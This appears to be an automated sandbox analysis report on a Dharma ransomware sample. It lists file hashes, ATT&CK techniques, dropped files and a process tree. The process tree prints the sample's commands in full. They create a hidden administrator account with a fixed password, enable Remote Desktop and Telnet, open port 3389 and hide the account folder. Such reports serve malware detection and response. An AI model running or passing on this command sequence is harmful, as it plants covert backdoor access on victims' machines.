022728f678d8dcc6cba20147595ed4099e9c98be0582c0f67518d5664e3b8523

Analysis

max time kernel
147s
max time network
116s
platform
windows10-2004_x64
resource
win10v2004-20240226-uk
resource tags

arch:x64arch:x86image:win10v2004-20240226-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
03-03-2024 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/Dharma.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4412	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5052	attrib.exe

Sets service image path in registry 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hxwxwhqxxcixtyr\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\hxwxwhqxxcixtyr.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qgrznjiejtvudkuq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\qgrznjiejtvudkuq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mdmwjkgswayiasxaf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mdmwjkgswayiasxaf.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qeglhdnziuhvrcddu\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\qeglhdnziuhvrcddu.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zobvyfxymluabn\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zobvyfxymluabn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lijatossldfbwqn\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\lijatossldfbwqn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\emjusivlkcllqhm\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\emjusivlkcllqhm.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Dharma.exe

Executes dropped EXE 4 IoCs

pid	Process
2084	nc123.exe
4664	mssql.exe
3964	mssql2.exe
2636	SearchHost.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4808	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe
4664	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeLoadDriverPrivilege	4664	mssql.exe
Token: SeDebugPrivilege	3964	mssql2.exe
Token: SeIncreaseQuotaPrivilege	3340	WMIC.exe
Token: SeSecurityPrivilege	3340	WMIC.exe
Token: SeTakeOwnershipPrivilege	3340	WMIC.exe
Token: SeLoadDriverPrivilege	3340	WMIC.exe
Token: SeSystemProfilePrivilege	3340	WMIC.exe
Token: SeSystemtimePrivilege	3340	WMIC.exe
Token: SeProfSingleProcessPrivilege	3340	WMIC.exe
Token: SeIncBasePriorityPrivilege	3340	WMIC.exe
Token: SeCreatePagefilePrivilege	3340	WMIC.exe
Token: SeBackupPrivilege	3340	WMIC.exe
Token: SeRestorePrivilege	3340	WMIC.exe
Token: SeShutdownPrivilege	3340	WMIC.exe
Token: SeDebugPrivilege	3340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3340	WMIC.exe
Token: SeRemoteShutdownPrivilege	3340	WMIC.exe
Token: SeUndockPrivilege	3340	WMIC.exe
Token: SeManageVolumePrivilege	3340	WMIC.exe
Token: 33	3340	WMIC.exe
Token: 34	3340	WMIC.exe
Token: 35	3340	WMIC.exe
Token: 36	3340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3340	WMIC.exe
Token: SeSecurityPrivilege	3340	WMIC.exe
Token: SeTakeOwnershipPrivilege	3340	WMIC.exe
Token: SeLoadDriverPrivilege	3340	WMIC.exe
Token: SeSystemProfilePrivilege	3340	WMIC.exe
Token: SeSystemtimePrivilege	3340	WMIC.exe
Token: SeProfSingleProcessPrivilege	3340	WMIC.exe
Token: SeIncBasePriorityPrivilege	3340	WMIC.exe
Token: SeCreatePagefilePrivilege	3340	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2636	SearchHost.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2636	SearchHost.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4664	mssql.exe
4664	mssql.exe
3964	mssql2.exe
3964	mssql2.exe
2636	SearchHost.exe
4664	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1676 wrote to memory of 2084	1676	Dharma.exe	87
PID 1676 wrote to memory of 2084	1676	Dharma.exe	87
PID 1676 wrote to memory of 2084	1676	Dharma.exe	87
PID 1676 wrote to memory of 4664	1676	Dharma.exe	90
PID 1676 wrote to memory of 4664	1676	Dharma.exe	90
PID 1676 wrote to memory of 3964	1676	Dharma.exe	91
PID 1676 wrote to memory of 3964	1676	Dharma.exe	91
PID 1676 wrote to memory of 3964	1676	Dharma.exe	91
PID 1676 wrote to memory of 4084	1676	Dharma.exe	92
PID 1676 wrote to memory of 4084	1676	Dharma.exe	92
PID 1676 wrote to memory of 4084	1676	Dharma.exe	92
PID 1676 wrote to memory of 1652	1676	Dharma.exe	93
PID 1676 wrote to memory of 1652	1676	Dharma.exe	93
PID 1676 wrote to memory of 1652	1676	Dharma.exe	93
PID 1676 wrote to memory of 2636	1676	Dharma.exe	95
PID 1676 wrote to memory of 2636	1676	Dharma.exe	95
PID 1676 wrote to memory of 2636	1676	Dharma.exe	95
PID 1652 wrote to memory of 3812	1652	cmd.exe	97
PID 1652 wrote to memory of 3812	1652	cmd.exe	97
PID 1652 wrote to memory of 3812	1652	cmd.exe	97
PID 3812 wrote to memory of 3340	3812	cmd.exe	98
PID 3812 wrote to memory of 3340	3812	cmd.exe	98
PID 3812 wrote to memory of 3340	3812	cmd.exe	98
PID 3812 wrote to memory of 1948	3812	cmd.exe	99
PID 3812 wrote to memory of 1948	3812	cmd.exe	99
PID 3812 wrote to memory of 1948	3812	cmd.exe	99
PID 2084 wrote to memory of 5072	2084	nc123.exe	100
PID 2084 wrote to memory of 5072	2084	nc123.exe	100
PID 2084 wrote to memory of 5072	2084	nc123.exe	100
PID 1652 wrote to memory of 1016	1652	cmd.exe	102
PID 1652 wrote to memory of 1016	1652	cmd.exe	102
PID 1652 wrote to memory of 1016	1652	cmd.exe	102
PID 1016 wrote to memory of 1952	1016	net.exe	103
PID 1016 wrote to memory of 1952	1016	net.exe	103
PID 1016 wrote to memory of 1952	1016	net.exe	103
PID 1652 wrote to memory of 4124	1652	cmd.exe	104
PID 1652 wrote to memory of 4124	1652	cmd.exe	104
PID 1652 wrote to memory of 4124	1652	cmd.exe	104
PID 4124 wrote to memory of 2800	4124	net.exe	105
PID 4124 wrote to memory of 2800	4124	net.exe	105
PID 4124 wrote to memory of 2800	4124	net.exe	105
PID 1652 wrote to memory of 4896	1652	cmd.exe	106
PID 1652 wrote to memory of 4896	1652	cmd.exe	106
PID 1652 wrote to memory of 4896	1652	cmd.exe	106
PID 4896 wrote to memory of 1792	4896	cmd.exe	107
PID 4896 wrote to memory of 1792	4896	cmd.exe	107
PID 4896 wrote to memory of 1792	4896	cmd.exe	107
PID 4896 wrote to memory of 440	4896	cmd.exe	108
PID 4896 wrote to memory of 440	4896	cmd.exe	108
PID 4896 wrote to memory of 440	4896	cmd.exe	108
PID 1652 wrote to memory of 1692	1652	cmd.exe	109
PID 1652 wrote to memory of 1692	1652	cmd.exe	109
PID 1652 wrote to memory of 1692	1652	cmd.exe	109
PID 1692 wrote to memory of 2896	1692	net.exe	110
PID 1692 wrote to memory of 2896	1692	net.exe	110
PID 1692 wrote to memory of 2896	1692	net.exe	110
PID 1652 wrote to memory of 660	1652	cmd.exe	111
PID 1652 wrote to memory of 660	1652	cmd.exe	111
PID 1652 wrote to memory of 660	1652	cmd.exe	111
PID 660 wrote to memory of 1368	660	net.exe	112
PID 660 wrote to memory of 1368	660	net.exe	112
PID 660 wrote to memory of 1368	660	net.exe	112
PID 1652 wrote to memory of 2708	1652	cmd.exe	113
PID 1652 wrote to memory of 2708	1652	cmd.exe	113

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5052	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
  "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5072
- C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
  "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4664
- C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
  "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "
  2⤵
  PID:4084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3340
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:1948
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:1952
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      PID:1792
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:440
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      PID:2896
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:1368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\systembackup +r +a +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5052
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 "Remote Desktop"
    3⤵
    - Modifies Windows Firewall
    PID:4412
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start=auto
    3⤵
    - Launches sc.exe
    PID:4808
- - C:\Windows\SysWOW64\net.exe
    net start Telnet
    3⤵
    PID:4068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Telnet
      4⤵
      PID:3704
- C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
  "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\Everything.ini

Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe

Filesize
1.2MB

MD5
6ef42a556d786194ad5bc00e78140bd1

SHA1
a736b478969b0f64c8ce85ced5ac4cd06f573add

SHA256
99b0b7d6e917ff9e18ca74fbf2ce93b9e0cb4b6ea99b4083fe5a3feb53d62c15

SHA512
8bae32f8dde8ac2201684f5c4ff5e5e7593a3808affb8ab108919c30c878354d98536822d0e0bb04632e9a0ddaf6e117aca40e5c725c7fa98138a18a4a6b20da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe

Filesize
1.1MB

MD5
48c3c05e474978dbe05e1cd5b8efa8a1

SHA1
4d617f1d16d4f2a14506a7109ebbc961872971ee

SHA256
5450315a060c8832a5be3101126b75350678aa0a7912641f6cfc30c40518ec5a

SHA512
2fc892dcdedbdfa544c3b1283c832d2805229d0999f76087dfaa01bc35587607a8993477d3f67880d6604c7f6291dc73b4afa3153e9b2d6c58dbae8b9bcd9df0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe

Filesize
1.0MB

MD5
60c5449a75cc0b7762a0b55e51c93575

SHA1
1a662c2bef418c582ad92dbcf3d9e16390fe258a

SHA256
1f51cbf7d3e387c16358bb8440119dd204654cadd6b1bae283fb31c8ded75e1a

SHA512
31b83733ce6519c890eeaf751e6d15b6617af51bba4e476bc549b96bf41d92159bca506eab4b27d1e87c408c23c162231e4a7ce01ba16bd4768a34e7848a23d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat

Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe

Filesize
4.0MB

MD5
1dc6fe7c3efa951a860416b0a65f70d4

SHA1
490be97030b3be8605877b2aa6a1dd124ad6b037

SHA256
7f11aaec06708bcb0033dcc478a51ae8715faecafa520e09049f4f9cf4d0b53d

SHA512
483db4449931615f65963a8c9e52f2b6a92ad6b77827550b79647e72d9bc480f47b457277cff1256f82dfa6a1766d58174b206895991e6f22ef4f61661c69ac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe

Filesize
3.4MB

MD5
5027d67863abf36371006646ff6dd1df

SHA1
f0936938005751c3076a1348173c87ceb1f7c816

SHA256
7004d14b834f43d57cbe03878b20e3907256f4510307875531c03b772f5de9f2

SHA512
e9898f7012d3f79e2546eed070b4ba052af77ac24c538224412052c84654c0ed4ef4b1fe50b6ff7cb21445581da0c1168925f91425a6ff313a63b35eeaab3a4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe

Filesize
3.9MB

MD5
79db3c991fc35a03a82b42db51f6089b

SHA1
7a193e743cdcb24d6b115ebe654e193ef7cb5d67

SHA256
211c9cd213fecfa735049b7522edda3509975e361265a793ea4212601ebe5940

SHA512
0e8389d0c26282909ec4931a287e733f165374906de2a4a25516b7b1a55a592999bbba3a86ed1afd599364922d78eeb8fc8c56b79a2decc8a0a0ac7477ca3565

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe

Filesize
1.5MB

MD5
1c4d6fa7e123e15b0fb9aea3bc376b0f

SHA1
6550b8ce65bb040446aa1fb7bef5c2e04aa6a5ee

SHA256
18b23205490a57d9de4de0e8b1cdc5b6d25afaab9e020e17d348c9481e3387ad

SHA512
f891693afa9a4fef9203d7c0f33cf76276ad899e6cef16d384d5ddc276eefcb9d2ac19e5cf061cc78059f2efb71892c99e2d6056c70d83080f23d4cd8fafe699

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe

Filesize
1.4MB

MD5
32e8c95de42cdddb5fbb93c8777b706c

SHA1
9559bf37d8bcd6785e30c3bbce25208d372952ca

SHA256
86958c2d5c93a3a769558c70f4e8aecd91800ab165279fe49b72c40fd8528b2a

SHA512
d7a1e54417f3c31f8076c2518a78ff6739a22ac0126c03dc3a7a04b74670819c2fe7f944e4bbc364edcc983bac7d52cb6c1a3c7f252dd771b3f3bc1b3034ee1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\qeglhdnziuhvrcddu.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat

Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
memory/3964-158-0x0000000075800000-0x00000000758F0000-memory.dmp

Filesize
960KB

Download
memory/3964-155-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3964-164-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3964-173-0x0000000075800000-0x00000000758F0000-memory.dmp

Filesize
960KB

Download
memory/4664-163-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4664-165-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4664-174-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads